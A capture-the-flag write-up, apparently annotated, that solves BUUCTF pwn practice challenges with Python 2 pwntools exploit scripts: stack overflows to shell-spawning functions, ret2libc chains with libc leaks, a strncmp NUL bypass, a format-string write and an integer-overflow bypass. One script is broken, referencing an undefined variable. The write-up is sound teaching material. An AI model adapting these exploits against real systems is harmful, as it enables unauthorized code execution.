BUUCTF pwn水题大赏
test_your_nc
就 nc 上去,然后 cat flag
rip
gets 栈溢出到 /bin/sh
exp:
# Exploit script for "rip" (Python 2 syntax, pwntools).
# Vulnerability class per the write-up: the target reads input with gets(),
# which has no length bound, so the caller's saved return address on the stack
# can be overwritten. Target-side mitigation is a bounded read (fgets / read
# with an explicit size) together with a stack canary.
from pwn import*
#p=process('./pwn1')
# Connects to the CTF practice instance; the commented line above is the
# equivalent local run.
p=remote('node3.buuoj.cn',25250)
# 0xf + 8 filler bytes, then the little-endian 8-byte address 0x40118a that the
# write-up says reaches /bin/sh. The extra 8 bytes are presumably the saved
# frame pointer -- inferred from the layout, not shown here.
payload='a'*0xf+'a'*8+p64(0x40118a)
p.sendline(payload)
p.interactive()
warmup_csaw_2016
gets 栈溢出到 sub_40060D
exp:
# Exploit script for warmup_csaw_2016 (Python 2 syntax, pwntools).
# Same root cause as "rip": an unbounded gets() lets the input run past the
# buffer into the saved return address. Bounded input and a stack canary
# would stop this class of bug on the target side.
from pwn import*
p=process('./warmup_csaw_2016')
#p=remote('node3.buuoj.cn',27740)
# 0x48 filler bytes up to the saved return address, then the address of
# sub_40060D that the write-up names as the target.
payload='a'*0x48+p64(0x40060d)
p.sendline(payload)
p.interactive()
pwn1_sctf_2016
c++ 题目,当输入 i 时会被替换成 you,输入 20 个 i 就可以溢出到 get_flag
exp:
# Exploit script for pwn1_sctf_2016 (Python 2 syntax, pwntools).
# Per the write-up the C++ target rewrites each input "i" to "you", so the
# data grows after the length check -- an expansion-after-validation bug. The
# fix on the target side is to bound the *expanded* length, not the raw one.
from pwn import *
p=process('./pwn1_sctf_2016')
# Remote line is commented out and has no port filled in.
#p=remote('node3.buuoj.cn',)
# 20 'I' characters (the write-up says 20 are enough after expansion), 4 filler
# bytes, then get_flag at 0x08048F0D. p64 on a 32-bit address emits 8 bytes,
# the upper four being zero.
payload='I'*20+'a'*4+p64(0x08048F0D)
p.sendline(payload)
p.interactive()
ciscn_2019_n_1
gets 栈溢出绕过 if
exp:
# Exploit script for ciscn_2019_n_1 (Python 2 syntax, pwntools).
# Root cause again is an unbounded gets(); the write-up's goal is to skip an
# `if` check by returning directly past it rather than satisfying it.
from pwn import*
p=process('./ciscn_2019_n_1')
#p=remote('node3.buuoj.cn',27504)
# 0x30 + 8 filler bytes, then the return address 0x4006be inside the code
# path that the if-check normally guards. The 8 extra bytes are presumably
# the saved frame pointer -- not shown here.
payload='a'*0x30+'a'*8+p64(0x4006be)
p.sendline(payload)
p.interactive()
jarvisoj_level0
栈溢出到 callsystem 函数(要用 ret 将栈对齐)
exp:
# Exploit script for jarvisoj_level0 (Python 2 syntax, pwntools).
# Stack overflow into the saved return address; the write-up notes a bare
# `ret` gadget is needed first so the stack is 16-byte aligned when the
# callsystem function runs (x86-64 ABI requirement).
from pwn import*
p=process('./level0')
#p=remote('node3.buuoj.cn',29842)
# Address of a single `ret` instruction used purely for alignment.
ret = 0x0000000000400431
# 0x88 filler bytes, the ret gadget, then callsystem at 0x400596.
payload='a'*0x88+p64(ret)+p64(0x0400596)
p.sendline(payload)
p.interactive()
ciscn_2019_c_1
puts 泄露 libc,gets 栈溢出
exp:
# Exploit script for ciscn_2019_c_1 (Python 2 syntax, pwntools).
# Two-stage ret2libc: stage 1 uses the gets() overflow to call puts() on a GOT
# entry and leak a libc address (ASLR defeats a fixed system() address, so a
# leak is required); stage 2 reuses the same overflow with the computed
# addresses. The libc offsets below are hard-coded for one specific libc build
# and will not match any other.
from pwn import*
p=process('./ciscn_2019_c_1')
#p=remote('node3.buuoj.cn',28840)
# Verbose pwntools I/O logging.
context.log_level = 'debug'
# Bare `ret` gadget for 16-byte stack alignment before the libc call.
ret=0x00000000004006b9
# `pop rdi; ret` gadget: loads the first argument register.
pop_rdi=0x0000000000400c83
elf=ELF('./ciscn_2019_c_1')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_plt = elf.sym['main']
# Stage 1 chain: puts(puts_got) to print the resolved puts address, then
# return to main so the program can be overflowed a second time.
payload='a'*0x50+'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_plt)
p.sendlineafter("choice!",'1')
p.sendline(payload)
# Reads up to the 0x7f byte that ends a typical 6-byte user-space address,
# keeps the last 6 bytes and zero-pads to 8 before unpacking.
puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
print hex(puts_addr)
# Hard-coded offsets of puts, system and the "/bin/sh" string in the target's
# libc build.
libc_base=puts_addr-0x080a30
print hex(libc_base)
libc_sys=libc_base+0x04f4e0
libc_sh=libc_base+0x1b40fa
p.sendlineafter("choice!",'1')
# Stage 2 chain: align, then system("/bin/sh"); trailing p64(0) is the next
# return slot after system.
payload2='a'*0x50+'a'*8+p64(ret)+p64(pop_rdi)+p64(libc_sh)+p64(libc_sys)+p64(0)
p.sendline(payload2)
p.interactive()
[OGeek2019]babyrop
write 泄露 libc,\x00 绕过 strncmp
exp:
# Exploit script for [OGeek2019]babyrop (32-bit, Python 2 syntax, pwntools).
# Per the write-up a leading NUL byte defeats a strncmp()-based check (strncmp
# stops at the first NUL, so a comparison that trusts it sees an empty
# string), after which a stack overflow and a write()-based libc leak follow.
# Target-side mitigation: compare with a fixed-length memcmp and bound the read.
from pwn import*
# Third-party helper that looks up a libc build from a leaked symbol address.
from LibcSearcher import*
p=process('./pwn')
#p=remote('node3.buuoj.cn',28116)
elf=ELF('./pwn')
write_plt=elf.plt['write']
read_got=elf.got['read']
read_plt=elf.plt['read']
main_addr=0x8048825
# First byte is NUL to pass the strncmp check; the 0xff bytes that follow are
# what the write-up relies on for the later length -- not shown here.
payload1='\x00'+'\xff'*0x7
p.sendline(payload1)
p.recvuntil('Correct')
# 32-bit chain: write(1, read_got, 8) with main as write's return address.
payload2='a'*0xe7+'b'*0x4+p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(0x8)
p.sendline(payload2)
# NOTE(review): `r` is never defined in this script; as written this line
# raises NameError. The connection object elsewhere in the script is `p`.
read_addr=u32(r.recv(4))
print hex(read_addr)
libc=LibcSearcher('read',read_addr)
libc_base=read_addr-libc.dump('read')
system_addr=libc_base+libc.dump('system')
bin_sh_addr=libc_base+libc.dump('str_bin_sh')
p.sendline(payload1)
p.recvuntil('Correct')
# Second pass: system(bin_sh); system_addr repeated so the return slot after
# system is also a valid address.
payload3='a'*0xe7+'b'*0x4+p32(system_addr)*2+p32(bin_sh_addr)
p.sendline(payload3)
p.interactive()
[第五空间2019 决赛]PWN5
格式化字符串,偏移 10,将 unk_804C044 改成固定数值
exp:
# Exploit script for [第五空间2019 决赛]PWN5 (32-bit, Python 2 syntax, pwntools).
# Format-string bug: user input is passed to printf as the format, so `%n`
# turns it into an arbitrary write. Target-side fix is printf("%s", buf) or a
# compiler warning for non-literal formats.
from pwn import*
p=process('./pwn5')
#p=remote('node3.buuoj.cn',25955)
unk_804C044=0x0804C044
# The 4-byte address sits at format argument offset 10 (per the write-up);
# `%10$n` stores the count of bytes printed so far -- the 4 address bytes --
# into that location. The password '4' below matches that count.
payload=p32(unk_804C044)+'%10$n'
p.sendlineafter('your name:',payload)
p.sendlineafter('your passwd:','4')
p.interactive()
[BJDCTF 2nd]r2t3
整数溢出
exp:
# Exploit script for [BJDCTF 2nd]r2t3 (32-bit, Python 2 syntax, pwntools).
# Integer overflow: the write-up says the target's length check uses a narrow
# integer, so a long input wraps to a small value and passes the check before
# the full copy. Target-side fix is a size_t comparison against the buffer size.
from pwn import*
p=process('./r2t3')
#p=remote('node3.buuoj.cn',28250)
p.recvuntil("name:")
# 0x11+0x4 filler bytes, the return address 0x0804858B, then 235 padding bytes.
# Total length is 260; presumably chosen so it wraps in the narrow length
# field -- TODO confirm against the binary.
payload=(0x11+0x4)*'a'+p32(0x0804858B)+'a'*235
p.sendline(payload)
p.interactive()